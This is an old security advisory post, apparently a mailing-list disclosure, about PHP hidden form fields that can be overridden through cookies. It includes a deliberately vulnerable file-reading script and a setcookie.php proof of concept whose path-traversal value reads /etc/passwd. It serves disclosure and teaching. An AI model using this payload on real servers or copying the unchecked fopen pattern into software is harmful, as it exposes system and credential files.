PHP forms can be subverted if the programmer assumed hidden fields are secure variables. Exploit description included.
b339aa9764132f4633481513cf0cb8e1a255f49e3aba89daaec2c95d5a8c11ec
#php exploit by Daniel Phoenix
synopsis: problem exists where users can change values of variables in
forms by simply
setting a cookie. I can only see this as a real problem where a
programmer
explicitly sets hidden fields he does not want the user to change.
Solution: Don't ever assume hidden fields are secure variables.
-------------------------------------example
exploit----------------------------------------------
ok first run form.php
hit enter and it should open a file called list.txt
---
ok now run setcookie.php
now it does not matter what you enter in form because
$test variable set in cookies will overide anything passed
from the form.Run the form again
--your password file comes up.
----------------------------------form.php---------------------------------------------------------
<form action="print.php">
<input type="hidden" name="test" value="list.txt">
<input type="SUBMIT" name="whatever" value="let me see the file">
</form>
---------------------------------list.txt---------------------------------------------------------
test
test
test
test
test
test
test
test
test
test-------------------------------print.php---------------------------------------------------------
<?
$myfile=fopen($test,"r");
fpassthru("$myfile");
?>
------------------------------setcookie.php-----------------------------------------------------
<?
setcookie("test","../../../../../../etc/passwd");
echo "cookie inserted";
?>
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com